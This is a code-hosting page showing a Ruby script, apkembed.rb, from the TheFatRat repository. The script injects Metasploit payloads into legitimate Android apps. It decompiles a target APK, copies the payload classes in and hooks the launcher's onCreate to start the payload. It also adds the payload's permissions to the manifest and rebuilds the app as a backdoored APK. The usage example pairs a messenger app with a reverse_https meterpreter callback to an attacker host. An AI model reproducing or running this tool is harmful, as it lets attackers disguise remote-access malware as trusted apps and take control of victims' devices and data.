Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
screetsec
GitHub Repository: screetsec/TheFatRat
 Path: blob/master/tools/apkembed.rb
495 views
1
#!/usr/bin/env ruby

2
# aembed backdoor original script from timwr & Jack64

3
# recoded by Edo maland ( Scretsec ) for compitable with thefatrat and fixed error :))

4
# This script is a POC for injecti  ng metasploit payloads

5
# Aribitary apk_backdoor

6
# Backdooring original apk files with metasploit

7


8


9


10
require 'nokogiri'

11
require 'fileutils'

12
require 'optparse'

13


14
# Find the activity thatapk_backdoor.rb  is opened when you click the app icon

15
def findlauncheractivity(amanifest)

16
    package = amanifest.xpath("//manifest").first['package']

17
    activities = amanifest.xpath("//activity|//activity-alias")

18
    for activity in activities

19
        activityname = activity.attribute("name")

20
        category = activity.search('category')

21
        unless category

22
            next

23
        end

24
        for cat in category

25
            categoryname = cat.attribute('name')

26
            if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')

27
                activityname = activityname.to_s

28
                unless activityname.start_with?(package)

29
                    activityname = package + activityname

30
                end

31
                return activityname

32
            end

33
        end

34
    end

35
end

36


37
# If XML parsing of the manifest fails, recursively search

38
# the smali code for the onCreate() hook and let the user

39
# pick the injection point

40
def scrapeFilesForLauncherActivity()

41
	smali_files||=[]

42
	Dir.glob('temp/original/smali*/**/*.smali') do |file|

43
	  checkFile=File.read(file)

44
	  if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")

45
		smali_files << file

46
		smalifile = file

47
		activitysmali = checkFile

48
	  end

49
	end

50
	i=0

51
	print "[*] Please choose from one of the following:\n"

52
	smali_files.each{|s_file|

53
		print "[+] Hook point ",i,": ",s_file,"\n"

54
		i+=1

55
	}

56
	hook=-1

57
	while (hook < 0 || hook>i)

58
		print "\nHook: "

59
		hook = STDIN.gets.chomp.to_i

60
	end

61
	i=0

62
	smalifile=""

63
	activitysmali=""

64
	smali_files.each{|s_file|

65
		if (i==hook)

66
			checkFile=File.read(s_file)

67
			smalifile=s_file

68
			activitysmali = checkFile

69
			break

70
		end

71
		i+=1

72
	}

73
	return [smalifile,activitysmali]

74
end

75


76
def fix_manifest()

77
	payload_permissions=[]

78


79
	#Load payload's permissions

80
	File.open("temp/payload/AndroidManifest.xml","r"){|file|

81
		k=File.read(file)

82
		payload_manifest=Nokogiri::XML(k)

83
		permissions = payload_manifest.xpath("//manifest/uses-permission")

84
		for permission in permissions

85
			name=permission.attribute("name")

86
			payload_permissions << name.to_s

87
		end

88
	#	print "#{k}"

89
	}

90
	original_permissions=[]

91
	apk_mani=''

92
        

93
        #Load original apk's permissions

94
	File.open("temp/original/AndroidManifest.xml","r"){|file2|

95
		k=File.read(file2)

96
		apk_mani=k

97
		original_manifest=Nokogiri::XML(k)

98
		permissions = original_manifest.xpath("//manifest/uses-permission")

99
		for permission in permissions

100
			name=permission.attribute("name")

101
			original_permissions << name.to_s

102
		end

103
	#	print "#{k}"

104
	}

105
	#Get permissions that are not in original APK

106
	add_permissions=[]

107
	for permission in payload_permissions

108
		if !(original_permissions.include? permission)

109
			print "[*] Adding #{permission}\n"

110
			add_permissions << permission

111
		end

112
	end

113
	inject=0

114
	new_mani=""

115
	#Inject permissions in original APK's manifest

116
	for line in apk_mani.split("\n")

117
		if (line.include? "uses-permission" and inject==0)

118
			for permission in add_permissions

119
				new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"

120
			end

121
			new_mani << line+"\n"

122
			inject=1

123
		else

124
			new_mani << line+"\n"

125
		end

126
	end

127
	File.open("temp/original/AndroidManifest.xml", "w") {|file| file.puts new_mani }

128
end

129


130
apkfile = ARGV[0]

131
unless(apkfile && File.readable?(apkfile))

132
	puts "Usage: #{$0} [target.apk] [msfvenom options]\n"

133
	puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"

134
	exit(1)

135
end

136


137
jarsigner = `which jarsigner`

138
unless(jarsigner && jarsigner.length > 0)

139
	puts "No jarsigner"

140
	exit(1)

141
end

142


143
apktool = `which apktool`

144
unless(apktool && apktool.length > 0)

145
	puts "No apktool"

146
	exit(1)

147
end

148


149
apk_v=`apktool`

150
unless(apk_v.split()[1].include?("v2."))

151
	puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"

152
	exit(1)

153
end

154


155
print "[*] Signing payload..\n"

156
`jarsigner -verbose -keystore temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'temp/payload.apk' androiddebugkey`

157


158
`rm -rf temp/original`

159
`rm -rf temp/payload`

160


161
`cp #{apkfile} temp/original.apk`

162


163
print "[*] Decompiling original APK..\n"

164
`apktool d temp/app.apk -o temp/original`

165
print "[*] Decompiling payload APK..\n"

166
`apktool d temp/payload.apk -o temp/payload`

167


168
f = File.open("temp/original/AndroidManifest.xml")

169
amanifest = Nokogiri::XML(f)

170
f.close

171


172
print "[*] Locating onCreate() hook..\n"

173


174


175
launcheractivity = findlauncheractivity(amanifest)

176
smalifile = 'temp/original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'

177
begin

178
	activitysmali = File.read(smalifile)

179
rescue Errno::ENOENT

180
	print "[!] Unable to find correct hook automatically\n"

181
	begin

182
		results=scrapeFilesForLauncherActivity()

183
		smalifile=results[0]

184
		activitysmali=results[1]

185
	rescue

186
		puts "[-] Error finding launcher activity. Exiting"

187
		exit(1)

188
	end

189
end

190


191
print "[*] Copying payload files..\n"

192
FileUtils.mkdir_p('temp/original/smali/com/metasploit/stage/')

193
FileUtils.cp Dir.glob('temp/payload/smali/com/metasploit/stage/Payload*.smali'), 'temp/original/smali/com/metasploit/stage/'

194
activitycreate = ';->onCreate(Landroid/os/Bundle;)V'

195
payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"

196
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)

197
print "[*] Loading ",smalifile," and injecting payload..\n"

198
File.open(smalifile, "w") {|file| file.puts hookedsmali }

199
injected_apk=apkfile.split(".")[0]

200
injected_apk+="_backdoored.apk"

201


202
print "[*] Poisoning the manifest with meterpreter permissions..\n"

203
fix_manifest()

204


205
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"

206
`apktool b -o #{injected_apk} temp/original`

207


208
puts "[+] Infected file #{injected_apk} ready.\n"

209


210